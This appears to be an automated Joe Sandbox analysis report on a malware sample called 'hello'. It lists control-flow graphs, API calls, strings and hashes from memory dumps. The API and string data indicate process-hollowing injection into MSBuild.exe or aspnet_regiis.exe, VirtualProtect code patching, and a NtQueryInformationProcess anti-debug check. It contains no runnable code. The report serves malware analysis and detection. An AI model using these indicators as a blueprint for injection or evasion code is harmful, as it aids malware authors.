                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48919B35A042049FCB45EF78C4645AE7BB2EFC9310F2485AAD906DB385DA359E06CBE1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$Write$AllocThreadVirtual$CloseContextCreateHandleWindowWow64$ConsoleReadResumeShow
                                                                                                                                                                                                                                          • String ID: /|$8taD$9"K8$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$Nomo$OizW$OuAi$V./8$_ggk$_ggk$`4+$`4+$cTc_$e]u!$kernel32.dll$n,Ra$ntdll.dll$dL$u\L
                                                                                                                                                                                                                                          • API String ID: 2214060374-1281667046
                                                                                                                                                                                                                                          • Opcode ID: b4ee67da5a6b46e54a66b4c4ad2117a6b8bb983c5356fddb85d91d9302f7500b
                                                                                                                                                                                                                                          • Instruction ID: 3bf8784c3aca521b93a6435f4f22f5016c80e7c43e6f928ce9f6fc8be037349e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4ee67da5a6b46e54a66b4c4ad2117a6b8bb983c5356fddb85d91d9302f7500b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26D32872A46219CFCF18CE2CC9813C977F6EB4A318F108299D515E7B94D7369E848F92

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1296 6c381300-6c38135e 1297 6c381368-6c381379 1296->1297 1298 6c38137f-6c38138f 1297->1298 1299 6c381c63-6c381d0a CreateFileMappingA 1297->1299 1302 6c381a69-6c381aff GetCurrentProcess call 6c390590 GetModuleHandleA 1298->1302 1303 6c381395-6c3813a5 1298->1303 1301 6c38274a 1299->1301 1301->1297 1302->1301 1306 6c3813ab-6c3813bb 1303->1306 1307 6c381964-6c3819cd 1303->1307 1310 6c3813c1-6c3813d1 1306->1310 1311 6c381d43-6c381d5c 1306->1311 1307->1301 1313 6c38201b-6c38208c 1310->1313 1314 6c3813d7-6c3813e7 1310->1314 1311->1301 1313->1301 1316 6c381ffd-6c382016 1314->1316 1317 6c3813ed-6c3813fd 1314->1317 1316->1301 1319 6c3825de-6c38264c call 6c392900 1317->1319 1320 6c381403-6c381413 1317->1320 1319->1301 1324 6c381419-6c381429 1320->1324 1325 6c381ec3-6c381f47 1320->1325 1327 6c381b5e-6c381b73 1324->1327 1328 6c38142f-6c38143f 1324->1328 1325->1301 1327->1301 1330 6c3821bf-6c382242 call 6c392900 1328->1330 1331 6c381445-6c381455 1328->1331 1330->1301 1334 6c38145b-6c38146b 1331->1334 1335 6c382473-6c382487 1331->1335 1338 6c381471-6c381481 1334->1338 1339 6c381b13-6c381b59 K32GetModuleInformation 1334->1339 1335->1301 1341 6c381d1e-6c381d3e 1338->1341 1342 6c381487-6c381497 1338->1342 1339->1301 1341->1301 1344 6c38149d-6c3814ad 1342->1344 1345 6c3825a5-6c3825b5 1342->1345 1347 6c38213b-6c382169 1344->1347 1348 6c3814b3-6c3814c3 1344->1348 1345->1301 1347->1301 1350 6c3814c9-6c3814d9 1348->1350 1351 6c381d61-6c381d73 1348->1351 1353 6c3822fe-6c382450 VirtualProtect call 6c3906f0 VirtualProtect 1350->1353 1354 6c3814df-6c3814ef 1350->1354 1351->1301 1353->1301 1358 6c38186f-6c3818be 1354->1358 1359 6c3814f5-6c381505 1354->1359 1358->1301 1361 6c38150b-6c38151b 1359->1361 1362 6c382247-6c382260 1359->1362 1364 6c3825ba-6c3825c4 1361->1364 1365 6c381521-6c381531 1361->1365 1362->1301 1364->1301 1367 6c381955-6c38195f 1365->1367 1368 6c381537-6c381547 1365->1368 1367->1301 1370 6c381c0b-6c381c15 1368->1370 1371 6c38154d-6c38155d 1368->1371 1370->1301 1373 6c3822ad-6c3822f9 1371->1373 1374 6c381563-6c381573 1371->1374 1373->1301 1376 6c381579-6c381589 1374->1376 1377 6c3818c3-6c381950 1374->1377 1379 6c38158f-6c38159f 1376->1379 1380 6c382265-6c382278 1376->1380 1377->1301 1382 6c3824c8-6c3824e3 FindCloseChangeNotification 1379->1382 1383 6c3815a5-6c3815b5 1379->1383 1380->1301 1382->1301 1385 6c3815bb-6c3815cb 1383->1385 1386 6c381e21-6c381e47 1383->1386 1388 6c381a5a-6c381a64 1385->1388 1389 6c3815d1-6c3815e1 1385->1389 1386->1301 1388->1301 1391 6c381d96-6c381da0 1389->1391 1392 6c3815e7-6c3815f7 1389->1392 1391->1301 1394 6c3815fd-6c38160d 1392->1394 1395 6c381e72-6c381ebe 1392->1395 1397 6c381613-6c381623 1394->1397 1398 6c381da5-6c381de5 MapViewOfFile 1394->1398 1395->1301 1400 6c3825c9-6c3825d9 1397->1400 1401 6c381629-6c381639 1397->1401 1398->1301 1400->1301 1403 6c38248c-6c3824aa 1401->1403 1404 6c38163f-6c38164f 1401->1404 1403->1301 1406 6c381b04-6c381b0e 1404->1406 1407 6c381655-6c381665 1404->1407 1406->1301 1409 6c38166b-6c38167b 1407->1409 1410 6c382464-6c38246e 1407->1410 1412 6c38212c-6c382136 1409->1412 1413 6c381681-6c381691 1409->1413 1410->1301 1412->1301 1415 6c38253d-6c382547 1413->1415 1416 6c381697-6c3816a7 1413->1416 1415->1301 1418 6c3816ad-6c3816bd 1416->1418 1419 6c38216e-6c3821ba 1416->1419 1421 6c381b78-6c381c06 GetModuleFileNameA CreateFileA 1418->1421 1422 6c3816c3-6c3816d3 1418->1422 1419->1301 1421->1301 1424 6c3816d9-6c3816e9 1422->1424 1425 6c381c1a-6c381c5e 1422->1425 1427 6c381d78-6c381d91 CloseHandle 1424->1427 1428 6c3816ef-6c3816ff 1424->1428 1425->1301 1427->1301 1430 6c3819d2-6c381a55 1428->1430 1431 6c381705-6c381715 1428->1431 1430->1301 1433 6c38171b-6c38172b 1431->1433 1434 6c382455-6c38245f 1431->1434 1436 6c382651-6c382740 VirtualProtect call 6c3906f0 VirtualProtect 1433->1436 1437 6c381731-6c381741 1433->1437 1434->1301 1436->1301 1440 6c38255b-6c3825a0 CreateFileMappingA 1437->1440 1441 6c381747-6c381757 1437->1441 1440->1301 1444 6c381fac-6c381ff8 1441->1444 1445 6c38175d-6c38176d 1441->1445 1444->1301 1447 6c381e4c-6c381e6d 1445->1447 1448 6c381773-6c381783 1445->1448 1447->1301 1450 6c381789-6c381799 1448->1450 1451 6c381f4c-6c381f56 1448->1451 1453 6c3824e8-6c382517 CloseHandle * 2 1450->1453 1454 6c38179f-6c3817af 1450->1454 1451->1301 1453->1301 1456 6c381dea-6c381e1c 1454->1456 1457 6c3817b5-6c3817c5 1454->1457 1456->1301 1459 6c3817cb-6c3817db 1457->1459 1460 6c38227d-6c3822a8 1457->1460 1462 6c381f5b-6c381fa7 1459->1462 1463 6c3817e1-6c3817f1 1459->1463 1460->1301 1462->1301 1465 6c382091-6c382127 1463->1465 1466 6c3817f7-6c381807 1463->1466 1465->1301 1468 6c38252b-6c38253c call 6c38f990 1466->1468 1469 6c38180d-6c38181d 1466->1469 1472 6c38251c-6c382526 1469->1472 1473 6c381823-6c381833 1469->1473 1472->1301 1476 6c381839-6c381849 1473->1476 1477 6c3824af-6c3824c3 1473->1477 1479 6c381d0f-6c381d19 1476->1479 1480 6c38184f-6c38185f 1476->1480 1477->1301 1479->1301 1482 6c38254c-6c382556 1480->1482 1483 6c381865-6c38186a 1480->1483 1482->1301 1483->1301
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseProtectVirtual$CreateHandle$Mapping$ChangeFindModuleNameNotificationView
                                                                                                                                                                                                                                          • String ID: .text$@
                                                                                                                                                                                                                                          • API String ID: 2948071595-3116941980
                                                                                                                                                                                                                                          • Opcode ID: 24ec83de3ef5628a10ff2daf628fb7007caadbc16c2037ad8858af3c4e23d9d5
                                                                                                                                                                                                                                          • Instruction ID: 3bd0344389e10115c87f4682a220b7a8be43f635d8209cb4ae07bbe79fddc951
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24ec83de3ef5628a10ff2daf628fb7007caadbc16c2037ad8858af3c4e23d9d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88B29775A052088FCB04CF6CC9987CDBBF5EB4A314F108199E899EB754D7369A89CF12

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1485 6c386970-6c386989 1486 6c386990-6c38699b 1485->1486 1487 6c386c9b-6c386ca2 1486->1487 1488 6c3869a1-6c3869ae 1486->1488 1489 6c386dc7 1487->1489 1491 6c386dc0 1488->1491 1492 6c3869b4-6c3869c1 1488->1492 1489->1486 1491->1489 1494 6c386ab5-6c386b45 GetModuleHandleW call 6c382750 call 6c390590 1492->1494 1495 6c3869c7-6c3869d4 1492->1495 1494->1489 1498 6c3869da-6c3869e7 1495->1498 1499 6c386ca7-6c386cb5 1495->1499 1504 6c3869ed-6c3869fa 1498->1504 1505 6c386d26-6c386d8c 1498->1505 1499->1489 1507 6c386c8f-6c386c96 1504->1507 1508 6c386a00-6c386a0d 1504->1508 1505->1489 1507->1489 1510 6c386cd8-6c386d21 1508->1510 1511 6c386a13-6c386a20 1508->1511 1510->1489 1513 6c386dac-6c386dbb 1511->1513 1514 6c386a26-6c386a33 1511->1514 1513->1489 1516 6c386a39-6c386a46 1514->1516 1517 6c386b94-6c386ba4 1514->1517 1519 6c386ba9-6c386c0f 1516->1519 1520 6c386a4c-6c386a59 1516->1520 1517->1489 1519->1489 1522 6c386cba-6c386cc1 1520->1522 1523 6c386a5f-6c386a6c 1520->1523 1522->1489 1525 6c386d91-6c386dab call 6c38f990 1523->1525 1526 6c386a72-6c386a7f 1523->1526 1529 6c386b4a-6c386b8f NtQueryInformationProcess 1526->1529 1530 6c386a85-6c386a92 1526->1530 1529->1489 1533 6c386a98-6c386aa5 1530->1533 1534 6c386c14-6c386c8a 1530->1534 1536 6c386aab-6c386ab0 1533->1536 1537 6c386cc6-6c386cd3 1533->1537 1534->1489 1536->1489 1537->1489
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6C386AE3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID: o$o$7rk\$NtQueryInformationProcess$ntdll.dll$~RN7
                                                                                                                                                                                                                                          • API String ID: 4139908857-2936130007
                                                                                                                                                                                                                                          • Opcode ID: 7a24debb61682cd940fbc37ff111241c80aee258a5e2962a4990f2c40c94e53b
                                                                                                                                                                                                                                          • Instruction ID: 2d3a1d11b95cb375ef4e327b604349108a74e4c52ecba874fd6eaef1b8adaca1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a24debb61682cd940fbc37ff111241c80aee258a5e2962a4990f2c40c94e53b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDB1BEB1A662089FCB04DFACD585BDD7BF5EB4A318F108619E811EBB40C73A98098F51

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1539 6c38faf8-6c38fb0b call 6c390350 1542 6c38fb0d-6c38fb0f 1539->1542 1543 6c38fb11-6c38fb33 call 6c38ff40 1539->1543 1544 6c38fb7a-6c38fb89 1542->1544 1547 6c38fba0-6c38fbb9 call 6c3901da call 6c390350 1543->1547 1548 6c38fb35-6c38fb78 call 6c39000b call 6c38fec7 call 6c390323 call 6c38fb8d call 6c3901ac call 6c38fb9a 1543->1548 1559 6c38fbca-6c38fbd1 1547->1559 1560 6c38fbbb-6c38fbc1 1547->1560 1548->1544 1563 6c38fbdd-6c38fbf1 dllmain_raw 1559->1563 1564 6c38fbd3-6c38fbd6 1559->1564 1560->1559 1562 6c38fbc3-6c38fbc5 1560->1562 1566 6c38fca3-6c38fcb2 1562->1566 1569 6c38fc9a-6c38fca1 1563->1569 1570 6c38fbf7-6c38fc08 dllmain_crt_dispatch 1563->1570 1564->1563 1567 6c38fbd8-6c38fbdb 1564->1567 1571 6c38fc0e-6c38fc20 call 6c38f0d0 1567->1571 1569->1566 1570->1569 1570->1571 1578 6c38fc49-6c38fc4b 1571->1578 1579 6c38fc22-6c38fc24 1571->1579 1580 6c38fc4d-6c38fc50 1578->1580 1581 6c38fc52-6c38fc63 dllmain_crt_dispatch 1578->1581 1579->1578 1582 6c38fc26-6c38fc44 call 6c38f0d0 call 6c38faf8 dllmain_raw 1579->1582 1580->1569 1580->1581 1581->1569 1583 6c38fc65-6c38fc97 dllmain_raw 1581->1583 1582->1578 1583->1569
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6C38FB3F
                                                                                                                                                                                                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6C38FB59
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2442719207-0
                                                                                                                                                                                                                                          • Opcode ID: 3a43725cec723d4aebceeab9d1825e8b01707c0aed9c60df87b94ee3d3ea1e4f
                                                                                                                                                                                                                                          • Instruction ID: cd09745716cc419951cfe340db43b3f5d1c5a16a84af5be61ef514c4d985f8d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a43725cec723d4aebceeab9d1825e8b01707c0aed9c60df87b94ee3d3ea1e4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A41F672E02618EBDB11AF69CC40BDE3B78EF4DBA8F114116EC5467B50D7318A058FA1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1589 6c38fba8-6c38fbb9 call 6c390350 1592 6c38fbca-6c38fbd1 1589->1592 1593 6c38fbbb-6c38fbc1 1589->1593 1595 6c38fbdd-6c38fbf1 dllmain_raw 1592->1595 1596 6c38fbd3-6c38fbd6 1592->1596 1593->1592 1594 6c38fbc3-6c38fbc5 1593->1594 1597 6c38fca3-6c38fcb2 1594->1597 1599 6c38fc9a-6c38fca1 1595->1599 1600 6c38fbf7-6c38fc08 dllmain_crt_dispatch 1595->1600 1596->1595 1598 6c38fbd8-6c38fbdb 1596->1598 1601 6c38fc0e-6c38fc20 call 6c38f0d0 1598->1601 1599->1597 1600->1599 1600->1601 1604 6c38fc49-6c38fc4b 1601->1604 1605 6c38fc22-6c38fc24 1601->1605 1606 6c38fc4d-6c38fc50 1604->1606 1607 6c38fc52-6c38fc63 dllmain_crt_dispatch 1604->1607 1605->1604 1608 6c38fc26-6c38fc44 call 6c38f0d0 call 6c38faf8 dllmain_raw 1605->1608 1606->1599 1606->1607 1607->1599 1609 6c38fc65-6c38fc97 dllmain_raw 1607->1609 1608->1604 1609->1599
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                          • Opcode ID: 0b2b32a28587f08adba2d65b66fd08552e5f1dc7c672453ecb0b0707a22fb36e
                                                                                                                                                                                                                                          • Instruction ID: eb3e4f20f4f557484b1c8b7b00479e33dbe0b7d0ad0d6395784716b82092d069
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b2b32a28587f08adba2d65b66fd08552e5f1dc7c672453ecb0b0707a22fb36e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21A372E43619ABDB216F55CD40AAF3A78EF88BD8F114115FC1857A10C7328E018FE0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1615 6c38f9f1-6c38f9ff call 6c390350 call 6c39003b 1619 6c38fa04-6c38fa07 1615->1619 1620 6c38fa0d-6c38fa25 call 6c38ff40 1619->1620 1621 6c38fade 1619->1621 1625 6c38fa2b-6c38fa3c call 6c38ff9d 1620->1625 1626 6c38faf0-6c38faf7 call 6c3901da 1620->1626 1623 6c38fae0-6c38faef 1621->1623 1631 6c38fa8b-6c38fa99 call 6c38fad4 1625->1631 1632 6c38fa3e-6c38fa60 call 6c3902f7 call 6c38febb call 6c38fedf call 6c392ee9 1625->1632 1631->1621 1637 6c38fa9b-6c38faa5 call 6c3901d4 1631->1637 1632->1631 1651 6c38fa62-6c38fa69 call 6c38ff72 1632->1651 1643 6c38fac6-6c38facf 1637->1643 1644 6c38faa7-6c38fab0 call 6c3900fb 1637->1644 1643->1623 1644->1643 1650 6c38fab2-6c38fac4 1644->1650 1650->1643 1651->1631 1655 6c38fa6b-6c38fa88 call 6c392ebe 1651->1655 1655->1631
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6C38FA3E
                                                                                                                                                                                                                                            • Part of subcall function 6C38FEBB: InitializeSListHead.KERNEL32(6C3CC020,6C38FA48,6C3A1650,00000010,6C38F9D9,?,?,?,6C38FC01,?,00000001,?,?,00000001,?,6C3A1698), ref: 6C38FEC0
                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C38FAA8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3231365870-0
                                                                                                                                                                                                                                          • Opcode ID: 6def85d78277a20fee2f3e4af6cd800cc1d5eb08e7e041f2a86bffb063e3d11a
                                                                                                                                                                                                                                          • Instruction ID: ccbdd947eac667958c0078290224bf5eb1afe8f65885b39fdd707f2c3ea91585
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6def85d78277a20fee2f3e4af6cd800cc1d5eb08e7e041f2a86bffb063e3d11a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621C332646285AADB00BBBC94407DD37709F0E3BCF244456D8D527F81EB6E5148CEA6

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1658 6c3965e7-6c3965ec 1659 6c3965ee-6c396606 1658->1659 1660 6c396608-6c39660c 1659->1660 1661 6c396614-6c39661d 1659->1661 1660->1661 1662 6c39660e-6c396612 1660->1662 1663 6c39662f 1661->1663 1664 6c39661f-6c396622 1661->1664 1665 6c396689-6c39668d 1662->1665 1668 6c396631-6c39663e GetStdHandle 1663->1668 1666 6c39662b-6c39662d 1664->1666 1667 6c396624-6c396629 1664->1667 1665->1659 1669 6c396693-6c396696 1665->1669 1666->1668 1667->1668 1670 6c39666b-6c39667d 1668->1670 1671 6c396640-6c396642 1668->1671 1670->1665 1673 6c39667f-6c396682 1670->1673 1671->1670 1672 6c396644-6c39664d GetFileType 1671->1672 1672->1670 1674 6c39664f-6c396658 1672->1674 1673->1665 1675 6c39665a-6c39665e 1674->1675 1676 6c396660-6c396663 1674->1676 1675->1665 1676->1665 1677 6c396665-6c396669 1676->1677 1677->1665
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 6C396633
                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(00000000), ref: 6C396645
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3000768030-0
                                                                                                                                                                                                                                          • Opcode ID: 3e5bc4e2b1e1692a352090364ce6a1bcdf3ee64d7976074093093aad93d13f1f
                                                                                                                                                                                                                                          • Instruction ID: f671dc6123442aef6fed36da7522414ce92981b2f9b8b14470efc35851ab5e91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e5bc4e2b1e1692a352090364ce6a1bcdf3ee64d7976074093093aad93d13f1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25112931206B41C6CB604E3E9C84613BAB8A797338B35071ED1B6C39F1E235D5828ED4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1789 1664e9c-166652a 1792 1666532-166655d LoadLibraryW 1789->1792 1793 166652c-166652f 1789->1793 1794 1666566-1666583 1792->1794 1795 166655f-1666565 1792->1795 1793->1792 1795->1794
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 01666550
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2674040094.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_1660000_hello.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 5696a23d272b2a01c1d8d5e12be513ea987b3d4812f08d4c160695be663c255d
                                                                                                                                                                                                                                          • Instruction ID: 33e1263f326e08a8fc5d58030f4ce881d453ad4749b04c52bd023b6f4828b9f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5696a23d272b2a01c1d8d5e12be513ea987b3d4812f08d4c160695be663c255d
